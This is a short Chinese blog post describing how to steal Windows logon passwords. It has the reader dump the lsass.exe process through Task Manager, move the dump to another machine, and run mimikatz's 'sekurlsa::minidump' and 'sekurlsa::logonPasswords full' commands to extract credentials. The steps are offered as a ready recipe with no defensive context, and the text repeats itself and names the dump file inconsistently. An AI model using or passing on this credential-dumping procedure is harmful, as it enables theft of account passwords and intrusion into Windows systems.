在公众号上看到的,研究了一下

过程如下:
打开任务管理器 lsass.exe进程,然后选择注册转储文件


然后把lass.dump 弄到本机,放到mimikatz目录下

过程如下:
打开任务管理器 lsass.exe进程,然后选择注册转储文件
然后把lass.dump 弄到本机,放到mimikatz目录下
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
上一篇
rmi 反序列利用过程
rmi 反序列利用过程
下一篇
https认证过程
https认证过程
版权声明:《 转储获取Windows密码 》为admin原创文章,转载请注明出处!
最后编辑:2020-5-27 03:05:45
提示:本文章评论功能已关闭